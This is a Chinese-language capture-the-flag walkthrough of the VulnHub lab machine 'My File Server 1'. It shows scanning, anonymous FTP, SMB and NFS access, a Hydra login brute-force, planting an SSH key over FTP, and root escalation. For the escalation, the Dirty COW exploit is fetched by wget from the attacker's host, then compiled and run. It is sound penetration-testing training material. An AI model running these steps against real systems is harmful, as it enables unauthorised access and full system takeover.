MyFileServer，vulnhub 靶机，难度适中，文件服务渗透基本功全面检测，内核提权。samba、nfs、ftp 文件服务渗透基本功的全面检测，更有终极提权心法，体会一下心态崩了之前的优雅吧！-红队笔记

my_file_server_1 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.104                         
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:29 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00013s latency).
Not shown: 64641 filtered tcp ports (no-response), 17 filtered tcp ports (host-prohibited), 869 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds

开放了 21,22,80,111,445,2049,2121,20048 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p21,22,80,111,445,2049,2121,20048 192.168.56.104
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:32 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00040s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh        OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http       Apache httpd 2.4.6 ((CentOS))
|_http-server-header: Apache/2.4.6 (CentOS)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: My File Server
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      43585/udp   nlockmgr
|   100021  1,3,4      47243/tcp6  nlockmgr
|   100021  1,3,4      54710/tcp   nlockmgr
|   100021  1,3,4      57541/udp6  nlockmgr
|   100024  1          41099/tcp   status
|   100024  1          43507/udp6  status
|   100024  1          53654/tcp6  status
|   100024  1          54065/udp   status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-p Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl    3 (RPC #100227)
2121/tcp  open  ftp        ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can\'t get directory listing: ERROR
20048/tcp open  mountd     1-3 (RPC #100005)
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 3.X|2.6.X|4.X|5.X (97%), Synology DiskStation Manager 5.X (95%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 3.4 - 3.10 (97%), Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (97%), Linux 3.10 (97%), Synology DiskStation Manager 5.2-5644 (95%), Linux 2.6.32 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.0 - 3.1 (91%), Linux 3.2 - 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-06-23T10:32:47
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1h50m02s, deviation: 3h10m30s, median: -3s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2023-06-23T16:02:46+05:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.59 seconds

21 ftp 支持匿名登录，445端口开启，2121也是 ftp 服务，同样支持匿名登陆，2049 nfs，smb 可访问，centos操作系统

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p21,22,80,111,445,2049,2121,20048 192.168.56.104
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:56 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00025s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-trace: TRACE is enabled
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 42.85 seconds

漏洞脚本扫描没什么结果

Web 服务查看

80 端口开放了，看一看，不过没什么东西，整个界面包括源代码都没有特殊的信息，只能判断出是个文件服务器

目录爆破一下

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.56.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t64 -x php,txt,sql,rar
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.104/
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,sql,rar
[+] Timeout:                 10s
===============================================================
2023/06/23 06:41:20 Starting gobuster in directory enumeration mode
===============================================================
/readme.txt           (Status: 200) [Size: 25]
Progress: 1102362 / 1102805 (99.96%)
===============================================================
2023/06/23 06:43:42 Finished
===============================================================

拿到了一个隐藏文件 readme.txt，打开发现

My Password is
rootroot1

到这里拿到了一个密码，还不知道到底是什么的密码，所以开始根据之前 ftp，smb，nfs 的信息开始处理（ssh 也纳入考虑，不过需要用户名，因此还是要先从 ftp、smb、nfs 入手）先尝试 ftp 匿名登录、smb 脚本扫描、nfs 挂载

ftp 匿名登录

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.104
Connected to 192.168.56.104.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
Name (192.168.56.104:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||33661|)
ftp: Can't connect to `192.168.56.104:33661': No route to host
ftp> 
ftp> epsv4 off
EPSV/EPRT on IPv4 off.
ftp> ls
227 Entering Passive Mode (192,168,56,104,131,84).
ftp: Can't connect to `192.168.56.104:33620': No route to host
ftp> passive 
Passive mode: off; fallback to active mode: off.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   9 root     root         4096 Feb 19  2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Feb 19  2020 anaconda
drwxr-x---   2 root     root           22 Feb 19  2020 audit
-rw-r--r--   1 root     root         7033 Feb 19  2020 boot.log
-rw-------   1 root     root        10752 Feb 19  2020 btmp
-rw-r--r--   1 root     root         9161 Feb 19  2020 cron
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg.old
drwxr-xr-x   2 root     root            6 Feb 19  2020 glusterfs
drwx------   2 root     root           39 Feb 19  2020 httpd
-rw-r--r--   1 root     root       292584 Feb 19  2020 lastlog
-rw-------   1 root     root         3764 Feb 19  2020 maillog
-rw-------   1 root     root      1423423 Feb 19  2020 messages
drwx------   2 root     root            6 Feb 19  2020 ppp
drwx------   4 root     root           43 Feb 19  2020 samba
-rw-------   1 root     root        63142 Feb 19  2020 secure
-rw-------   1 root     root            0 Feb 19  2020 spooler
-rw-------   1 root     root            0 Feb 19  2020 tallylog
drwxr-xr-x   2 root     root           22 Feb 19  2020 tuned
-rw-r--r--   1 root     root        58752 Feb 19  2020 wtmp
-rw-------   1 root     root          100 Feb 19  2020 xferlog
-rw-------   1 root     root        18076 Feb 19  2020 yum.log
226 Transfer complete

ftp 匿名登陆后，遇到无法回显的问题，借助于搜索解决了，后来想起来红队笔记有提过这件事：ftp 登录后先使用 binary 命令，防止某些错误信息。简单查看后发现只有一堆日志信息，从中手动提取出一些用户名，写入 user 文件用于之后爆破使用

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ cat user   
smbuser
smbdata
root
gluster
dbus
stapusr
stapsys
stapdev
input
systemd-network
printadmin
wbpriv

此外，这里我信息收集的敏感度还是不够，secure 日志文件中最后一行有 smbuser 的密码，sshd_config 文件中表明不支持密码登录，并给出了公钥目录

nfs 挂载

看看nfs

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.104
Export list for 192.168.56.104:
/smbdata 192.168.56.0/24

可以挂载，那就挂载到 kali 上

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.56.104:/smbdata /tmp/infosec
[sudo] password for kali: 
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ cd /tmp/infosec             
                                                                                                                    
┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls
anaconda  boot.log  cron   dmesg.old  lastlog  messages  samba   spooler      tallylog  wtmp     yum.log
audit     btmp      dmesg  glusterfs  maillog  ppp       secure  sshd_config  tuned     xferlog

这不还是刚才那些日志信息吗

smb 访问

看看 smb，也可以使用命令 sudo smbmap -H IP

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse -p445 192.168.56.104
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:43 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00018s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-users: 
|   FILESERVER\smbuser (RID: 1000)
|     Full name:   
|     Description: 
|_    Flags:       Normal user account
| smb-enum-shares: 
|   account_used: <blank>
|   \\192.168.56.104\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba 4.9.1)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|   \\192.168.56.104\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\drivers
|     Anonymous access: <none>
|   \\192.168.56.104\smbdata: 
|     Type: STYPE_DISKTREE
|     Comment: smbdata
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\smbdata
|     Anonymous access: READ/WRITE
|   \\192.168.56.104\smbuser: 
|     Type: STYPE_DISKTREE
|     Comment: smbuser
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\smbuser\
|_    Anonymous access: <none>

Nmap done: 1 IP address (1 host up) scanned in 27.11 seconds

脚本扫描的结果中有 smbdata 和 smbuser，使用 smbclient 命令行登录

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 23 06:43:28 2023
  ..                                  D        0  Tue Feb 18 06:47:54 2020
  anaconda                            D        0  Tue Feb 18 06:48:15 2020
  audit                               D        0  Tue Feb 18 06:48:15 2020
  boot.log                            N     6120  Tue Feb 18 06:48:16 2020
  btmp                                N      384  Tue Feb 18 06:48:16 2020
  cron                                N     4813  Tue Feb 18 06:48:16 2020
  dmesg                               N    31389  Tue Feb 18 06:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 06:48:16 2020
  glusterfs                           D        0  Tue Feb 18 06:48:16 2020
  lastlog                             N   292292  Tue Feb 18 06:48:16 2020
  maillog                             N     1982  Tue Feb 18 06:48:16 2020
  messages                            N   684379  Tue Feb 18 06:48:17 2020
  ppp                                 D        0  Tue Feb 18 06:48:17 2020
  samba                               D        0  Tue Feb 18 06:48:17 2020
  secure                              N    11937  Tue Feb 18 06:48:17 2020
  spooler                             N        0  Tue Feb 18 06:48:17 2020
  tallylog                            N        0  Tue Feb 18 06:48:17 2020
  tuned                               D        0  Tue Feb 18 06:48:17 2020
  wtmp                                N    25728  Tue Feb 18 06:48:17 2020
  xferlog                             N      100  Tue Feb 18 06:48:17 2020
  yum.log                             N    10915  Tue Feb 18 06:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 02:46:38 2020

                19976192 blocks of size 1024. 18153160 blocks available
smb: \> pwd
Current directory is \\192.168.56.104\smbdata\

一个登录失败，另一个还是刚才看到的日志信息。

爆破

考虑到之前拿到的密码一直没用上，那就利用刚才收集的用户，先尝试 ssh 爆破

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ hydra -L user -P passwd 192.168.56.104 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-25 05:30:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:13/p:1), ~1 try per task
[DATA] attacking ssh://192.168.56.104:22/
[ERROR] target ssh://192.168.56.104:22/ does not support password authentication (method reply 36).

似乎不支持密码登录，回头再处理吧。试试 ftp 爆破

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ hydra -L user -P passwd 192.168.56.104 ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-25 05:32:14
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:13/p:1), ~1 try per task
[DATA] attacking ftp://192.168.56.104:21/
[21][ftp] host: 192.168.56.104   login: smbuser   password: rootroot1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-25 05:32:18

ftp 竟然还有个 smbuser 用户，那我们就登陆这个用户看看

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ ftp 192.168.56.104        
Connected to 192.168.56.104.
220 (vsFTPd 3.0.2)
Name (192.168.56.104:kali): smbuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /home/smbuser
tp> ls -liah
drwx------    2 1000     1000           79 Feb 18  2020 .
drwxr-xr-x    3 0        0              20 Feb 19  2020 ..
-rw-------    1 1000     1000           27 Feb 20  2020 .bash_history
-rw-r--r--    1 1000     1000           18 Mar 05  2015 .bash_logout
-rw-r--r--    1 1000     1000          193 Mar 05  2015 .bash_profile
-rw-r--r--    1 1000     1000          231 Mar 05  2015 .bashrc

翻找来翻找去，只发现了 sshd_config 文件的权限设置的比较怪，同时借助于 passwd 文件确定了这个系统中有 bash 权限的只有 smbuser 和 root

ftp> ls -laih
drwxr-xr-x    2 0        0            4096 Feb 20  2020 .
drwxr-xr-x   86 0        0            8192 Feb 20  2020 ..
-rw-r--r--    1 0        0          581843 Aug 09  2019 moduli
-rw-r--r--    1 0        0            2276 Aug 09  2019 ssh_config
-rw-r-----    1 0        999           227 Feb 19  2020 ssh_host_ecdsa_key
-rw-r--r--    1 0        0             162 Feb 19  2020 ssh_host_ecdsa_key.pub
-rw-r-----    1 0        999           387 Feb 19  2020 ssh_host_ed25519_key
-rw-r--r--    1 0        0              82 Feb 19  2020 ssh_host_ed25519_key.pub
-rw-r-----    1 0        999          1679 Feb 19  2020 ssh_host_rsa_key
-rw-r--r--    1 0        0             382 Feb 19  2020 ssh_host_rsa_key.pub
-rwxrwxrwx    1 0        0            3929 Feb 20  2020 sshd_config

一开始以为是要修改 sshd_config 文件，但是修改了却无法使之生效。因此只能尝试另一种方法：通过上传公钥来远程登陆

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys

首先使用 ssh-keygen 命令来生成公私钥

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ sudo ssh-keygen                               
[sudo] password for kali: 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): smbuser
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in smbuser
Your public key has been saved in smbuser.pub
The key fingerprint is:
SHA256:CRKLhVZPo8026EZ5w3XTuItuKSNdRMjnnsDQQTy200Q root@kali
The key\'s randomart image is:
+---[RSA 3072]----+
|   o+==+E oo     |
|  oo.%Bo+....    |
| .. B+@O   .     |
|   o +=++..      |
|    o  =So .     |
|   .    = .      |
|     . o .       |
|    . + +        |
|     . +         |
+----[SHA256]-----+

通过 put 命令来上传文件

ftp> pwd
Remote directory: /home/smbuser/.ssh
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||5950|).
150 Ok to send data.
100% |***********************************************************************|   563        4.66 MiB/s    00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (883.92 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||5981|).
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000          563 Jun 25 10:46 authorized_keys
226 Directory send OK

ssh 私钥登录

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ sudo ssh -i smbuser smbuser@192.168.56.119
The authenticity of host \'192.168.56.119 (192.168.56.119)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.119' (ED25519) to the list of known hosts.
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 1                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ whoami
smbuser
[smbuser@fileserver ~]$ ls
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$ uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

提权

定时任务和 s 权限都没有收获

[smbuser@fileserver ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

[smbuser@fileserver ~]$ ls -liah /etc/crontab
34310891 -rw-r--r--. 1 root root 451 Jun 10  2014 /etc/crontab
[smbuser@fileserver ~]$ find / -type f -perm -04000 -ls 2>/dev/null
34179364   64 -rwsr-xr-x   1 root     root        64200 Mar  6  2015 /usr/bin/chage
34179365   80 -rwsr-xr-x   1 root     root        78168 Mar  6  2015 /usr/bin/gpasswd
34175860   44 -rwsr-xr-x   1 root     root        41752 Mar  6  2015 /usr/bin/newgrp
34182648   44 -rwsr-xr-x   1 root     root        44232 Mar  6  2015 /usr/bin/mount
34179705   24 -rws--x--x   1 root     root        23960 Mar  6  2015 /usr/bin/chfn
34179486   24 -rws--x--x   1 root     root        23856 Mar  6  2015 /usr/bin/chsh
34182663   32 -rwsr-xr-x   1 root     root        32064 Mar  6  2015 /usr/bin/su
34182667   32 -rwsr-xr-x   1 root     root        31960 Mar  6  2015 /usr/bin/umount
34362148   28 -rwsr-xr-x   1 root     root        27656 Jun 10  2014 /usr/bin/pkexec
34362174   60 -rwsr-xr-x   1 root     root        57536 Jul 30  2014 /usr/bin/crontab
34676864  128 ---s--x--x   1 root     root       130720 Mar  6  2015 /usr/bin/sudo
34296737  208 ---s--x---   1 root     stapusr    212080 Oct 18  2019 /usr/bin/staprun
34631418   28 -rwsr-xr-x   1 root     root        27832 Jun 10  2014 /usr/bin/passwd
67395239   12 -rwsr-xr-x   1 root     root        11208 Mar  6  2015 /usr/sbin/pam_timestamp_check
67395241   36 -rwsr-xr-x   1 root     root        36264 Mar  6  2015 /usr/sbin/unix_chkpwd
67574143   12 -rwsr-xr-x   1 root     root        11296 Aug  9  2019 /usr/sbin/usernetctl
68676026  116 -rwsr-xr-x   1 root     root       117432 Aug  9  2019 /usr/sbin/mount.nfs
67585748   16 -rwsr-xr-x   1 root     root        15416 Jun 10  2014 /usr/lib/polkit-1/polkit-agent-helper-1
101817405   60 -rwsr-x---   1 root     dbus        58024 Mar 14  2019 /usr/libexec/dbus-1/dbus-daemon-launch-helper
[smbuser@fileserver ~]$ systemd-run -t bash
Failed to start transient service unit: Interactive authentication required.
[smbuser@fileserver ~]$ sudo systemd-run -t bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for smbuser:

环境变量

[smbuser@fileserver ~]$ export $PATH
-bash: export: `/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/smbuser/.local/bin:/home/smbuser/bin': not a valid identifier

尝试使用各种内核漏洞进行提取

'Mutagen Astronomy' Local Privilege Escalation 需要内存在 32G 以上，SUID Position Independent Executable 'PIE' Local Privilege Escalation 程序运行错误，Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation 无返回，Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation 一直处于运行状态。最后的确有点不耐烦了，之后就是去搜索引擎，尝试搜索 kernel 3.10 exploit privilege 关键词，在其中找到了一个脏牛漏洞，利用成功

[smbuser@fileserver tmp]$ wget http://192.168.56.106:8088/40847.cpp
--2023-06-25 18:26:09--  http://192.168.56.106:8088/40847.cpp
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10212 (10.0K) [text/x-c++src]
Saving to: ‘40847.cpp’

100%[============================================================================>] 10,212      --.-K/s   in 0s      

2023-06-25 18:26:09 (396 MB/s) - ‘40847.cpp’ saved [10212/10212]

[smbuser@fileserver tmp]$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
[smbuser@fileserver tmp]$ ls
40847.cpp  dcow
[smbuser@fileserver tmp]$ ./dcow 
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)
[smbuser@fileserver tmp]$ su -
Password: 
Last login: Sun Jun 25 18:26:29 IST 2023 on pts/1
[root@fileserver ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@fileserver ~]# whoami
root
[root@fileserver ~]# cd /root
[root@fileserver ~]# ls
proof.txt
[root@fileserver ~]# cat proof.txt 
Best of Luck
af52e0163b03cbf7c6dd146351594a43